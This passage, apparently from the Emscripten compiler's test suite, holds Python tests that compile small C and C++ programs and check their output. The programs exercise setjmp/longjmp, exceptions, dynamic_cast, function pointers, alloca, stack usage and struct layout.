printf("*%s: %d,%d,%d,%d<%d*\\n", #struc, (int)&(s->a[0]), (int)&(s->a[1]), (int)&(s->a[2]), (int)&(s->later), sizeof(struc)); \\
}
printf("sizeofs:%d,%d\\n", sizeof(S6), sizeof(S6z));
TEST(C___);
TEST_ARR(Carr);
TEST(C__w);
TEST(Cp1_);
TEST(Cp2_);
TEST(Cint);
TEST(C4__);
TEST(C4_2);
TEST(C__z);
return 0;
}
'''
if Settings.QUANTUM_SIZE == 1:
self.do_run(src, 'sizeofs:6,8\n*C___: 0,3,6,9<24*\n*Carr: 0,3,6,9<24*\n*C__w: 0,3,9,12<24*\n*Cp1_: 1,2,5,8<24*\n*Cp2_: 0,2,5,8<24*\n*Cint: 0,3,4,7<24*\n*C4__: 0,3,4,7<24*\n*C4_2: 0,3,5,8<20*\n*C__z: 0,3,5,8<28*')
else:
self.do_run(src, 'sizeofs:6,8\n*C___: 0,6,12,20<24*\n*Carr: 0,6,12,20<24*\n*C__w: 0,6,12,20<24*\n*Cp1_: 4,6,12,20<24*\n*Cp2_: 0,6,12,20<24*\n*Cint: 0,8,12,20<24*\n*C4__: 0,8,12,20<24*\n*C4_2: 0,6,10,16<20*\n*C__z: 0,8,16,24<28*')
def test_assert(self):
src = '''
#include <stdio.h>
#include <assert.h>
int main() {
assert(1 == true); // pass
assert(1 == false); // fail
return 0;
}
'''
self.do_run(src, 'Assertion failed: 1 == false')
def test_libcextra(self):
if self.emcc_args is None: return self.skip('needs emcc for libcextra')
src = r'''
#include <stdio.h>
#include <wchar.h>
int main()
{
const wchar_t* wstr = L"Hello";
printf("wcslen: %d\n", wcslen(wstr));
return 0;
}
'''
self.do_run(src, 'wcslen: 5')
def test_longjmp(self):
src = r'''
#include <stdio.h>
#include <setjmp.h>
static jmp_buf buf;
void second(void) {
printf("second\n");
longjmp(buf,-1);
}
void first(void) {
printf("first\n"); // prints
longjmp(buf,1); // jumps back to where setjmp was called - making setjmp now return 1
}
int main() {
volatile int x = 0;
int jmpval = setjmp(buf);
if (!jmpval) {
x++; // should be properly restored once longjmp jumps back
first(); // when executed, setjmp returns 1
printf("skipped\n"); // does not print
} else if (jmpval == 1) { // when first() jumps back, setjmp returns 1
printf("result: %d %d\n", x, jmpval); // prints
x++;
second(); // when executed, setjmp returns -1
} else if (jmpval == -1) { // when second() jumps back, setjmp returns -1
printf("result: %d %d\n", x, jmpval); // prints
}
return 0;
}
'''
self.do_run(src, 'first\nresult: 1 1\nsecond\nresult: 2 -1')
def test_longjmp2(self):
src = r'''
#include <setjmp.h>
#include <stdio.h>
typedef struct {
jmp_buf* jmp;
} jmp_state;
void stack_manipulate_func(jmp_state* s, int level) {
jmp_buf buf;
printf("Entering stack_manipulate_func, level: %d\n", level);
if (level == 0) {
s->jmp = &buf;
if (setjmp(*(s->jmp)) == 0) {
printf("Setjmp normal execution path, level: %d\n", level);
stack_manipulate_func(s, level + 1);
} else {
printf("Setjmp error execution path, level: %d\n", level);
}
} else {
printf("Perform longjmp at level %d\n", level);
longjmp(*(s->jmp), 1);
}
printf("Exiting stack_manipulate_func, level: %d\n", level);
}
int main(int argc, char *argv[]) {
jmp_state s;
s.jmp = NULL;
stack_manipulate_func(&s, 0);
return 0;
}
'''
self.do_run(src, '''Entering stack_manipulate_func, level: 0
Setjmp normal execution path, level: 0
Entering stack_manipulate_func, level: 1
Perform longjmp at level 1
Setjmp error execution path, level: 0
Exiting stack_manipulate_func, level: 0
''')
def test_longjmp3(self):
src = r'''
#include <setjmp.h>
#include <stdio.h>
typedef struct {
jmp_buf* jmp;
} jmp_state;
void setjmp_func(jmp_state* s, int level) {
jmp_buf* prev_jmp = s->jmp;
jmp_buf c_jmp;
if (level == 2) {
printf("level is 2, perform longjmp!\n");
longjmp(*(s->jmp), 1);
}
if (setjmp(c_jmp) == 0) {
printf("setjmp normal execution path, level: %d\n", level);
s->jmp = &c_jmp;
setjmp_func(s, level + 1);
} else {
printf("setjmp exception execution path, level: %d\n", level);
if (prev_jmp) {
printf("prev_jmp is not empty, continue with longjmp!\n");
s->jmp = prev_jmp;
longjmp(*(s->jmp), 1);
}
}
printf("Exiting setjmp function, level: %d\n", level);
}
int main(int argc, char *argv[]) {
jmp_state s;
s.jmp = NULL;
setjmp_func(&s, 0);
return 0;
}
'''
self.do_run(src, '''setjmp normal execution path, level: 0
setjmp normal execution path, level: 1
level is 2, perform longjmp!
setjmp exception execution path, level: 1
prev_jmp is not empty, continue with longjmp!
setjmp exception execution path, level: 0
Exiting setjmp function, level: 0
''')
def test_longjmp4(self):
src = r'''
#include <setjmp.h>
#include <stdio.h>
typedef struct {
jmp_buf* jmp;
} jmp_state;
void second_func(jmp_state* s);
void first_func(jmp_state* s) {
jmp_buf* prev_jmp = s->jmp;
jmp_buf c_jmp;
volatile int once = 0;
if (setjmp(c_jmp) == 0) {
printf("Normal execution path of first function!\n");
s->jmp = &c_jmp;
second_func(s);
} else {
printf("Exception execution path of first function! %d\n", once);
if (!once) {
printf("Calling longjmp the second time!\n");
once = 1;
longjmp(*(s->jmp), 1);
}
}
}
void second_func(jmp_state* s) {
longjmp(*(s->jmp), 1);
}
int main(int argc, char *argv[]) {
jmp_state s;
s.jmp = NULL;
first_func(&s);
return 0;
}
'''
self.do_run(src, '''Normal execution path of first function!
Exception execution path of first function! 0
Calling longjmp the second time!
Exception execution path of first function! 1
''')
def test_longjmp_funcptr(self):
src = r'''
#include <stdio.h>
#include <setjmp.h>
static jmp_buf buf;
void (*fp)() = NULL;
void second(void) {
printf("second\n"); // prints
longjmp(buf,1); // jumps back to where setjmp was called - making setjmp now return 1
}
void first(void) {
fp();
printf("first\n"); // does not print
}
int main(int argc, char **argv) {
fp = argc == 200 ? NULL : second;
volatile int x = 0;
if ( ! setjmp(buf) ) {
x++;
first(); // when executed, setjmp returns 0
} else { // when longjmp jumps back, setjmp returns 1
printf("main: %d\n", x); // prints
}
return 0;
}
'''
self.do_run(src, 'second\nmain: 1\n')
def test_longjmp_repeat(self):
Settings.MAX_SETJMPS = 1
src = r'''
#include <stdio.h>
#include <setjmp.h>
static jmp_buf buf;
int main() {
volatile int x = 0;
printf("setjmp:%d\n", setjmp(buf));
x++;
printf("x:%d\n", x);
if (x < 4) longjmp(buf, x*2);
return 0;
}
'''
self.do_run(src, '''setjmp:0
x:1
setjmp:2
x:2
setjmp:4
x:3
setjmp:6
x:4
''')
def test_longjmp_stacked(self):
src = r'''
#include <stdio.h>
#include <setjmp.h>
#include <stdlib.h>
#include <string.h>
int bottom, top;
int run(int y) {
// confuse stack
char *s = (char*)alloca(100);
memset(s, 1, 100);
s[y] = y;
s[y/2] = y*2;
volatile int x = s[y];
top = (int)alloca(4);
if (x <= 2) return x;
jmp_buf buf;
printf("setjmp of %d\n", x);
if (setjmp(buf) == 0) {
printf("going\n");
x += run(x/2);
longjmp(buf, 1);
}
printf("back\n");
return x/2;
}
int main(int argc, char **argv) {
int sum = 0;
for (int i = 0; i < argc*2; i++) {
bottom = (int)alloca(4);
sum += run(10);
// scorch the earth
if (bottom < top) {
memset((void*)bottom, 1, top - bottom);
} else {
memset((void*)top, 1, bottom - top);
}
}
printf("%d\n", sum);
return sum;
}
'''
self.do_run(src, '''setjmp of 10
going
setjmp of 5
going
back
back
setjmp of 10
going
setjmp of 5
going
back
back
12
''')
def test_longjmp_exc(self):
src = r'''
#include <stdlib.h>
#include <stdio.h>
#include <setjmp.h>
#include <emscripten.h>
jmp_buf abortframe;
void dostuff(int a) {
printf("pre\n");
if (a != 42) emscripten_run_script("waka_waka()"); // this should fail, and never reach "never"
printf("never\n");
if (a == 100) {
longjmp (abortframe, -1);
}
if (setjmp(abortframe)) {
printf("got 100");
}
}
int main(int argc, char **argv) {
dostuff(argc);
exit(1);
return 1;
}
'''
self.do_run(src, 'waka_waka');
def test_setjmp_many(self):
src = r'''
#include <stdio.h>
#include <setjmp.h>
int main(int argc) {
jmp_buf buf;
for (int i = 0; i < NUM; i++) printf("%d\n", setjmp(buf));
if (argc-- == 1131) longjmp(buf, 11);
return 0;
}
'''
for num in [Settings.MAX_SETJMPS, Settings.MAX_SETJMPS+1]:
print num
self.do_run(src.replace('NUM', str(num)), '0\n' * num if num <= Settings.MAX_SETJMPS or not Settings.ASM_JS else 'build with a higher value for MAX_SETJMPS')
def test_exceptions(self):
if Settings.QUANTUM_SIZE == 1: return self.skip("we don't support libcxx in q1")
if self.emcc_args is None: return self.skip('need emcc to add in libcxx properly')
Settings.EXCEPTION_DEBUG = 1
Settings.DISABLE_EXCEPTION_CATCHING = 0
if '-O2' in self.emcc_args:
self.emcc_args += ['--closure', '1'] # Use closure here for some additional coverage
src = '''
#include <stdio.h>
void thrower() {
printf("infunc...");
throw(99);
printf("FAIL");
}
int main() {
try {
printf("*throw...");
throw(1);
printf("FAIL");
} catch(...) {
printf("caught!");
}
try {
thrower();
} catch(...) {
printf("done!*\\n");
}
return 0;
}
'''
self.do_run(src, '*throw...caught!infunc...done!*')
Settings.DISABLE_EXCEPTION_CATCHING = 1
self.do_run(src, 'Exception catching is disabled, this exception cannot be caught. Compile with -s DISABLE_EXCEPTION_CATCHING=0')
src = '''
#include <iostream>
class MyException
{
public:
MyException(){ std::cout << "Construct..."; }
MyException( const MyException & ) { std::cout << "Copy..."; }
~MyException(){ std::cout << "Destruct..."; }
};
int function()
{
std::cout << "Throw...";
throw MyException();
}
int function2()
{
return function();
}
int main()
{
try
{
function2();
}
catch (MyException & e)
{
std::cout << "Catched...";
}
try
{
function2();
}
catch (MyException e)
{
std::cout << "Catched...";
}
return 0;
}
'''
Settings.DISABLE_EXCEPTION_CATCHING = 0
if '-O2' in self.emcc_args:
self.emcc_args.pop() ; self.emcc_args.pop() # disable closure to work around a closure bug
self.do_run(src, 'Throw...Construct...Catched...Destruct...Throw...Construct...Copy...Catched...Destruct...Destruct...')
def test_white_list_exception(self):
Settings.DISABLE_EXCEPTION_CATCHING = 2
Settings.EXCEPTION_CATCHING_WHITELIST = ["__Z12somefunctionv"]
Settings.INLINING_LIMIT = 50 # otherwise it is inlined and not identified
src = '''
#include <stdio.h>
void thrower() {
printf("infunc...");
throw(99);
printf("FAIL");
}
void somefunction() {
try {
thrower();
} catch(...) {
printf("done!*\\n");
}
}
int main() {
somefunction();
return 0;
}
'''
self.do_run(src, 'infunc...done!*')
Settings.DISABLE_EXCEPTION_CATCHING = 0
Settings.EXCEPTION_CATCHING_WHITELIST = []
def test_uncaught_exception(self):
if self.emcc_args is None: return self.skip('no libcxx inclusion without emcc')
Settings.DISABLE_EXCEPTION_CATCHING = 0
src = r'''
#include <stdio.h>
#include <exception>
struct X {
~X() {
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
}
};
int main() {
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
try {
X x;
throw 1;
} catch(...) {
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
}
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
return 0;
}
'''
self.do_run(src, 'exception? no\nexception? yes\nexception? no\nexception? no\n')
src = r'''
#include <fstream>
#include <iostream>
int main() {
std::ofstream os("test");
os << std::unitbuf << "foo"; // trigger a call to std::uncaught_exception from
// std::basic_ostream::sentry::~sentry
std::cout << "success";
}
'''
self.do_run(src, 'success')
def test_typed_exceptions(self):
Settings.DISABLE_EXCEPTION_CATCHING = 0
Settings.SAFE_HEAP = 0 # Throwing null will cause an ignorable null pointer access.
src = open(path_from_root('tests', 'exceptions', 'typed.cpp'), 'r').read()
expected = open(path_from_root('tests', 'exceptions', 'output.txt'), 'r').read()
self.do_run(src, expected)
def test_multiexception(self):
Settings.DISABLE_EXCEPTION_CATCHING = 0
src = r'''
#include <stdio.h>
static int current_exception_id = 0;
typedef struct {
int jmp;
} jmp_state;
void setjmp_func(jmp_state* s, int level) {
int prev_jmp = s->jmp;
int c_jmp;
if (level == 2) {
printf("level is 2, perform longjmp!\n");
throw 1;
}
c_jmp = current_exception_id++;
try {
printf("setjmp normal execution path, level: %d, prev_jmp: %d\n", level, prev_jmp);
s->jmp = c_jmp;
setjmp_func(s, level + 1);
} catch (int catched_eid) {
printf("caught %d\n", catched_eid);
if (catched_eid == c_jmp) {
printf("setjmp exception execution path, level: %d, prev_jmp: %d\n", level, prev_jmp);
if (prev_jmp != -1) {
printf("prev_jmp is not empty, continue with longjmp!\n");
s->jmp = prev_jmp;
throw s->jmp;
}
} else {
throw;
}
}
printf("Exiting setjmp function, level: %d, prev_jmp: %d\n", level, prev_jmp);
}
int main(int argc, char *argv[]) {
jmp_state s;
s.jmp = -1;
setjmp_func(&s, 0);
return 0;
}
'''
self.do_run(src, '''setjmp normal execution path, level: 0, prev_jmp: -1
setjmp normal execution path, level: 1, prev_jmp: 0
level is 2, perform longjmp!
caught 1
setjmp exception execution path, level: 1, prev_jmp: 0
prev_jmp is not empty, continue with longjmp!
caught 0
setjmp exception execution path, level: 0, prev_jmp: -1
Exiting setjmp function, level: 0, prev_jmp: -1
''')
def test_std_exception(self):
if self.emcc_args is None: return self.skip('requires emcc')
Settings.DISABLE_EXCEPTION_CATCHING = 0
self.emcc_args += ['-s', 'SAFE_HEAP=0']
src = r'''
#include <stdio.h>
#include <exception>
int main()
{
std::exception e;
try {
throw e;
} catch(std::exception e) {
printf("caught std::exception\n");
}
return 0;
}
'''
self.do_run(src, 'caught std::exception')
def test_exit_stack(self):
if self.emcc_args is None: return self.skip('requires emcc')
if Settings.ASM_JS: return self.skip('uses report_stack without exporting')
Settings.INLINING_LIMIT = 50
src = r'''
#include <stdio.h>
#include <stdlib.h>
extern "C" {
extern void report_stack(int x);
}
char moar() {
char temp[125];
for (int i = 0; i < 125; i++) temp[i] = i*i;
for (int i = 1; i < 125; i++) temp[i] += temp[i-1]/2;
if (temp[100] != 99) exit(1);
return temp[120];
}
int main(int argc, char *argv[]) {
report_stack((int)alloca(4));
printf("*%d*\n", moar());
return 0;
}
'''
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var initialStack = -1;
var _report_stack = function(x) {
Module.print('reported');
initialStack = x;
}
var Module = {
postRun: function() {
Module.print('postRun');
assert(initialStack == STACKTOP, [initialStack, STACKTOP]);
Module.print('ok.');
}
};
''')
self.emcc_args += ['--pre-js', 'pre.js']
self.do_run(src, '''reported\nExit Status: 1\npostRun\nok.\n''')
def test_class(self):
src = '''
#include <stdio.h>
struct Random {
enum { IM = 139968, IA = 3877, IC = 29573 };
Random() : last(42) {}
float get( float max = 1.0f ) {
last = ( last * IA + IC ) % IM;
return max * last / IM;
}
protected:
unsigned int last;
} rng1;
int main()
{
Random rng2;
int count = 0;
for (int i = 0; i < 100; i++) {
float x1 = rng1.get();
float x2 = rng2.get();
printf("%f, %f\\n", x1, x2);
if (x1 != x2) count += 1;
}
printf("*%d*\\n", count);
return 0;
}
'''
self.do_run(src, '*0*')
def test_inherit(self):
src = '''
#include <stdio.h>
struct Parent {
int x1, x2;
};
struct Child : Parent {
int y;
};
int main()
{
Parent a;
a.x1 = 50;
a.x2 = 87;
Child b;
b.x1 = 78;
b.x2 = 550;
b.y = 101;
Child* c = (Child*)&a;
c->x1 ++;
c = &b;
c->y --;
printf("*%d,%d,%d,%d,%d,%d,%d*\\n", a.x1, a.x2, b.x1, b.x2, b.y, c->x1, c->x2);
return 0;
}
'''
self.do_run(src, '*51,87,78,550,100,78,550*')
def test_isdigit_l(self):
if self.emcc_args is None: return self.skip('no libcxx inclusion without emcc')
src = '''
#include <iostream>
int main() {
using namespace std;
use_facet<num_put<char> >(cout.getloc()).put(cout, cout, '0', 3.14159265);
}
'''
self.do_run(src, '3.14159')
def test_polymorph(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = '''
#include <stdio.h>
struct Pure {
virtual int implme() = 0;
};
struct Parent : Pure {
virtual int getit() { return 11; };
int implme() { return 32; }
};
struct Child : Parent {
int getit() { return 74; }
int implme() { return 1012; }
};
struct Other {
int one() { return 11; }
int two() { return 22; }
};
int main()
{
Parent *x = new Parent();
Parent *y = new Child();
printf("*%d,%d,%d,%d*\\n", x->getit(), y->getit(), x->implme(), y->implme());
Other *o = new Other;
int (Other::*Ls)() = &Other::one;
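          // Ls is a pointer-to-member-function; it must be invoked through an object, as (o->*Ls)()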
printf("*%d*\\n", (o->*(Ls))());
Ls = &Other::two;
printf("*%d*\\n", (o->*(Ls))());
return 0;
}
'''
self.do_run(src, '*11,74,32,1012*\n*11*\n*22*')
def test_segfault(self):
if self.emcc_args is None: return self.skip('SAFE_HEAP without ta2 means we check types too, which hide segfaults')
if Settings.ASM_JS: return self.skip('asm does not support safe heap')
Settings.SAFE_HEAP = 1
for addr in ['0', 'new D2()']:
print addr
src = r'''
#include <stdio.h>
struct Classey {
virtual void doIt() = 0;
};
struct D1 : Classey {
virtual void doIt() { printf("fleefl\n"); }
};
struct D2 : Classey {
virtual void doIt() { printf("marfoosh\n"); }
};
int main(int argc, char **argv)
{
Classey *p = argc == 100 ? new D1() : (Classey*)%s;
p->doIt();
return 0;
}
''' % addr
self.do_run(src, 'segmentation fault' if addr.isdigit() else 'marfoosh')
def test_safe_dyncalls(self):
if Settings.ASM_JS: return self.skip('asm does not support missing function stack traces')
if Settings.SAFE_HEAP: return self.skip('safe heap warning will appear instead')
if self.emcc_args is None: return self.skip('need libc')
Settings.SAFE_DYNCALLS = 1
for cond, body, work in [(True, True, False), (True, False, False), (False, True, True), (False, False, False)]:
print cond, body, work
src = r'''
#include <stdio.h>
struct Classey {
virtual void doIt() = 0;
};
struct D1 : Classey {
virtual void doIt() BODY;
};
int main(int argc, char **argv)
{
Classey *p = argc COND 100 ? new D1() : NULL;
printf("%p\n", p);
p->doIt();
return 0;
}
'''.replace('COND', '==' if cond else '!=').replace('BODY', r'{ printf("all good\n"); }' if body else '')
self.do_run(src, 'dyncall error: vi' if not work else 'all good')
def test_dynamic_cast(self):
if self.emcc_args is None: return self.skip('need libcxxabi')
src = r'''
#include <stdio.h>
struct Support {
virtual void f() {
printf("f()\n");
}
};
struct Derived : Support {
};
int main() {
Support * p = new Derived;
dynamic_cast<Derived*>(p)->f();
}
'''
self.do_run(src, 'f()\n')
def test_dynamic_cast_b(self):
if self.emcc_args is None: return self.skip('need libcxxabi')
src = '''
#include <stdio.h>
class CBase { virtual void dummy() {} };
class CDerived : public CBase { int a; };
class CDerivedest : public CDerived { float b; };
int main ()
{
CBase *pa = new CBase;
CBase *pb = new CDerived;
CBase *pc = new CDerivedest;
printf("a1: %d\\n", dynamic_cast<CDerivedest*>(pa) != NULL);
printf("a2: %d\\n", dynamic_cast<CDerived*>(pa) != NULL);
printf("a3: %d\\n", dynamic_cast<CBase*>(pa) != NULL);
printf("b1: %d\\n", dynamic_cast<CDerivedest*>(pb) != NULL);
printf("b2: %d\\n", dynamic_cast<CDerived*>(pb) != NULL);
printf("b3: %d\\n", dynamic_cast<CBase*>(pb) != NULL);
printf("c1: %d\\n", dynamic_cast<CDerivedest*>(pc) != NULL);
printf("c2: %d\\n", dynamic_cast<CDerived*>(pc) != NULL);
printf("c3: %d\\n", dynamic_cast<CBase*>(pc) != NULL);
return 0;
}
'''
self.do_run(src, 'a1: 0\na2: 0\na3: 1\nb1: 0\nb2: 1\nb3: 1\nc1: 1\nc2: 1\nc3: 1\n')
def test_dynamic_cast_2(self):
if self.emcc_args is None: return self.skip('need libcxxabi')
src = r'''
#include <stdio.h>
#include <typeinfo>
class Class {};
int main() {
const Class* dp = dynamic_cast<const Class*>(&typeid(Class));
// should return dp == NULL,
printf("pointer: %p\n", dp);
}
'''
self.do_run(src, "pointer: (nil)")
def test_funcptr(self):
src = '''
#include <stdio.h>
int calc1() { return 26; }
int calc2() { return 90; }
typedef int (*fp_t)();
fp_t globally1 = calc1;
fp_t globally2 = calc2;
int nothing(const char *str) { return 0; }
int main()
{
fp_t fp = calc1;
void *vp = (void*)fp;
fp_t fpb = (fp_t)vp;
fp_t fp2 = calc2;
void *vp2 = (void*)fp2;
fp_t fpb2 = (fp_t)vp2;
printf("*%d,%d,%d,%d,%d,%d*\\n", fp(), fpb(), fp2(), fpb2(), globally1(), globally2());
fp_t t = calc1;
printf("*%d,%d", t == calc1, t == calc2);
t = calc2;
printf(",%d,%d*\\n", t == calc1, t == calc2);
int (*other)(const char *str);
other = nothing;
other("*hello!*");
other = puts;
other("*goodbye!*");
return 0;
}
'''
self.do_run(src, '*26,26,90,90,26,90*\n*1,0,0,1*\n*goodbye!*')
def test_mathfuncptr(self):
src = '''
#include <math.h>
#include <stdio.h>
int
main(int argc, char **argv) {
float (*fn)(float) = argc != 12 ? &sqrtf : &fabsf;
float (*fn2)(float) = argc != 13 ? &fabsf : &sqrtf;
float (*fn3)(float) = argc != 14 ? &erff : &fabsf;
printf("fn2(-5) = %d, fn(10) = %.2f, erf(10) = %.2f\\n", (int)fn2(-5), fn(10), fn3(10));
return 0;
}
'''
self.do_run(src, 'fn2(-5) = 5, fn(10) = 3.16, erf(10) = 1.00')
def test_funcptrfunc(self):
src = r'''
#include <stdio.h>
typedef void (*funcptr)(int, int);
typedef funcptr (*funcptrfunc)(int);
funcptr __attribute__ ((noinline)) getIt(int x) {
return (funcptr)x;
}
int main(int argc, char **argv)
{
funcptrfunc fpf = argc < 100 ? getIt : NULL;
printf("*%p*\n", fpf(argc));
return 0;
}
'''
self.do_run(src, '*0x1*')
def test_funcptr_namecollide(self):
src = r'''
#include <stdio.h>
void do_call(void (*puts)(const char *), const char *str);
void do_print(const char *str) {
if (!str) do_call(NULL, "delusion");
if ((int)str == -1) do_print(str+10);
puts("====");
puts(str);
puts("====");
}
void do_call(void (*puts)(const char *), const char *str) {
if (!str) do_print("confusion");
if ((int)str == -1) do_call(NULL, str-10);
(*puts)(str);
}
int main(int argc, char **argv)
{
for (int i = 0; i < argc; i++) {
do_call(i != 10 ? do_print : NULL, i != 15 ? "waka waka" : NULL);
}
return 0;
}
'''
self.do_run(src, 'waka', force_c=True)
def test_emptyclass(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = '''
#include <stdio.h>
struct Randomized {
Randomized(int x) {
printf("*zzcheezzz*\\n");
}
};
int main( int argc, const char *argv[] ) {
new Randomized(55);
return 0;
}
'''
self.do_run(src, '*zzcheezzz*')
def test_alloca(self):
src = '''
#include <stdio.h>
#include <stdlib.h>
int main() {
char *pc;
pc = (char *)alloca(5);
printf("z:%d*%d*\\n", pc > 0, (int)pc);
return 0;
}
'''
self.do_run(src, 'z:1*', force_c=True)
def test_rename(self):
src = '''
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <assert.h>
int main() {
int err;
FILE* fid;
err = mkdir("/foo", 0777);
err = mkdir("/bar", 0777);
fid = fopen("/foo/bar", "w+");
fclose(fid);
err = rename("/foo/bar", "/foo/bar2");
printf("%d\\n", err);
err = rename("/foo", "/foo/foo");
printf("%d\\n", err);
err = rename("/foo", "/bar/foo");
printf("%d\\n", err);
return 0;
}
'''
self.do_run(src, '0\n-1\n0\n', force_c=True)
def test_alloca_stack(self):
if self.emcc_args is None: return # too slow in other modes
# We should not blow up the stack with numerous allocas
src = '''
#include <stdio.h>
#include <stdlib.h>
int func(int i) {
char *pc = (char *)alloca(100);
*pc = i;
(*pc)++;
return (*pc) % 10;
}
int main() {
int total = 0;
for (int i = 0; i < 1024*1024; i++)
total += func(i);
printf("ok:%d*\\n", total);
return 0;
}
'''
self.do_run(src, 'ok:-32768*', force_c=True)
def test_stack_byval(self):
if self.emcc_args is None: return # too slow in other modes
# We should also not blow up the stack with byval arguments
src = r'''
#include<stdio.h>
struct vec {
int x, y, z;
vec(int x_, int y_, int z_) : x(x_), y(y_), z(z_) {}
static vec add(vec a, vec b) {
return vec(a.x+b.x, a.y+b.y, a.z+b.z);
}
};
int main() {
int total = 0;
for (int i = 0; i < 1000; i++) {
for (int j = 0; j < 1000; j++) {
vec c(i+i%10, j*2, i%255);
vec d(j*2, j%255, i%120);
vec f = vec::add(c, d);
total += (f.x + f.y + f.z) % 100;
total %= 10240;
}
}
printf("sum:%d*\n", total);
return 0;
}
'''
self.do_run(src, 'sum:9780*')
def test_stack_varargs(self):
if self.emcc_args is None: return # too slow in other modes
Settings.INLINING_LIMIT = 50
# We should not blow up the stack with numerous varargs
src = r'''
#include <stdio.h>
#include <stdlib.h>
void func(int i) {
printf("%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d\n",
i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i);
}
int main() {
for (int i = 0; i < 1024; i++)
func(i);
printf("ok!\n");
return 0;
}
'''
Settings.TOTAL_STACK = 1024
self.do_run(src, 'ok!')
def test_stack_void(self):
Settings.INLINING_LIMIT = 50
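# The printf below passes far more arguments than its format string consumes;
# repeating the call 5000 times checks that the excess varargs do not leak stack space.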
src = r'''
#include <stdio.h>
static char s[100]="aaaaa";
static int func(void) {
if(s[0]!='a') return 0;
printf("iso open %s\n", s, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001, 1.001);
return 0;
}
int main(){
int i;
for(i=0;i<5000;i++)
func();
printf(".ok.\n");
}
'''
self.do_run(src, '.ok.\n')
def test_life(self):
if self.emcc_args is None: return self.skip('need c99')
self.emcc_args += ['-std=c99']
src = open(path_from_root('tests', 'life.c'), 'r').read()
self.do_run(src, '''--------------------------------
[] [] [][][]
[] [] [] [][] [] [] []
[] [][] [][] [][][] []
[] [] [] [] [][] [] []
[] [][] [] [] [] [] [][][][]
[][] [][] [] [][][] [] []
[] [][] [][] [][] [][][]
[][] [][][] [] []
[][] [][] []
[][][]
[]
[][][]
[] [][] [][]
[][] [] [][] [][]
[][] [][]
[]
[][]
[][] []
[] [][] []
[][][] []
[] [][]
[] [] []
[]
[] [] []
[][][]
[]
[][][] []
--------------------------------
''', ['2'], force_c=True)
def test_array2(self):
src = '''
#include <stdio.h>
static const double grid[4][2] = {
{-3/3.,-1/3.},{+1/3.,-3/3.},
{-1/3.,+3/3.},{+3/3.,+1/3.}
};
int main() {
for (int i = 0; i < 4; i++)
printf("%d:%.2f,%.2f ", i, grid[i][0], grid[i][1]);
printf("\\n");
return 0;
}
'''
self.do_run(src, '0:-1.00,-0.33 1:0.33,-1.00 2:-0.33,1.00 3:1.00,0.33')
def test_array2b(self):
src = '''
#include <stdio.h>
static const struct {
unsigned char left;
unsigned char right;
} prioritah[] = {
{6, 6}, {6, 6}, {7, 95}, {7, 7}
};
int main() {
printf("*%d,%d\\n", prioritah[1].left, prioritah[1].right);
printf("%d,%d*\\n", prioritah[2].left, prioritah[2].right);
return 0;
}
'''
self.do_run(src, '*6,6\n7,95*')
def test_constglobalstructs(self):
src = '''
#include <stdio.h>
struct IUB {
int c;
double p;
unsigned int pi;
};
IUB iub[] = {
{ 'a', 0.27, 5 },
{ 'c', 0.15, 4 },
{ 'g', 0.12, 3 },
{ 't', 0.27, 2 },
};
const unsigned char faceedgesidx[6][4] =
{
{ 4, 5, 8, 10 },
{ 6, 7, 9, 11 },
{ 0, 2, 8, 9 },
{ 1, 3, 10,11 },
{ 0, 1, 4, 6 },
{ 2, 3, 5, 7 },
};
int main( int argc, const char *argv[] ) {
printf("*%d,%d,%d,%d*\\n", iub[0].c, int(iub[1].p*100), iub[2].pi, faceedgesidx[3][2]);
return 0;
}
'''
self.do_run(src, '*97,15,3,10*')
def test_conststructs(self):
src = '''
#include <stdio.h>
struct IUB {
int c;
double p;
unsigned int pi;
};
